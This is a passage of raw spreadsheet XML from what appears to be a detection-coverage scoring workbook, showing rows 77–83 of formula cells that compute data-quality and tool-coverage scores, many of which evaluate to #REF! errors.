        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U77" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V77" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W77" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X77" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F77&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F77))-LEN(SUBSTITUTE(TRIM(F77),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y77" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="78" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A78" s="8" t="s">
        <v>131</v>
      </c>
      <c r="B78" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C78" s="8" t="s">
        <v>593</v>
      </c>
      <c r="D78" s="10" t="s">
        <v>594</v>
      </c>
      <c r="E78" s="10" t="s">
        <v>595</v>
      </c>
      <c r="F78" s="10" t="s">
        <v>596</v>
      </c>
      <c r="G78" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K78,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H78" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I78" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J78" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K78" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L78" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M78" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N78" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O78" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P78" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q78" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R78" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S78" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T78" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U78" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V78" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W78" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X78" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F78&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F78))-LEN(SUBSTITUTE(TRIM(F78),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y78" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="79" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A79" s="8" t="s">
        <v>173</v>
      </c>
      <c r="B79" s="8" t="s">
        <v>443</v>
      </c>
      <c r="C79" s="8" t="s">
        <v>597</v>
      </c>
      <c r="D79" s="10" t="s">
        <v>598</v>
      </c>
      <c r="E79" s="10" t="s">
        <v>599</v>
      </c>
      <c r="F79" s="10" t="s">
        <v>600</v>
      </c>
      <c r="G79" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K79,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H79" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I79" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J79" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K79" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L79" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M79" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N79" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O79" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P79" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q79" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R79" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S79" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T79" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U79" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V79" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W79" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X79" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F79&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F79))-LEN(SUBSTITUTE(TRIM(F79),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y79" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="80" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A80" s="8" t="s">
        <v>104</v>
      </c>
      <c r="B80" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C80" s="8" t="s">
        <v>601</v>
      </c>
      <c r="D80" s="10" t="s">
        <v>602</v>
      </c>
      <c r="E80" s="10" t="s">
        <v>603</v>
      </c>
      <c r="F80" s="10" t="s">
        <v>604</v>
      </c>
      <c r="G80" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K80,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H80" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I80" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J80" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K80" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L80" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M80" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N80" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O80" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P80" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q80" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R80" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S80" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T80" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U80" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V80" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W80" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X80" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F80&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F80))-LEN(SUBSTITUTE(TRIM(F80),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y80" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="81" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A81" s="8" t="s">
        <v>116</v>
      </c>
      <c r="B81" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C81" s="8" t="s">
        <v>605</v>
      </c>
      <c r="D81" s="10" t="s">
        <v>606</v>
      </c>
      <c r="E81" s="10" t="s">
        <v>607</v>
      </c>
      <c r="F81" s="10" t="s">
        <v>608</v>
      </c>
      <c r="G81" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K81,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H81" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I81" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J81" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K81" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L81" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M81" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N81" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O81" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P81" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q81" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R81" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S81" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T81" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U81" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V81" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W81" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X81" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F81&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F81))-LEN(SUBSTITUTE(TRIM(F81),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y81" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="82" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A82" s="8" t="s">
        <v>62</v>
      </c>
      <c r="B82" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C82" s="8" t="s">
        <v>609</v>
      </c>
      <c r="D82" s="10" t="s">
        <v>610</v>
      </c>
      <c r="E82" s="10" t="s">
        <v>611</v>
      </c>
      <c r="F82" s="10" t="s">
        <v>442</v>
      </c>
      <c r="G82" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K82,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H82" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I82" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J82" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K82" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L82" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M82" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N82" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O82" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P82" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q82" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R82" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S82" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T82" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U82" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V82" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W82" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X82" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F82&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F82))-LEN(SUBSTITUTE(TRIM(F82),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y82" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="83" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A83" s="8" t="s">
        <v>115</v>
      </c>
      <c r="B83" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C83" s="8" t="s">
        <v>612</v>
      </c>
      <c r="D83" s="10" t="s">
        <v>613</v>
      </c>
      <c r="E83" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F83" s="10" t="s">
        <v>324</v>
      </c>
      <c r="G83" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K83,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H83" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I83" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J83" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K83" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L83" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F83&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F83))-LEN(SUBSTITUTE(TRIM(F83),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M83" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N83" s="20" t="e">
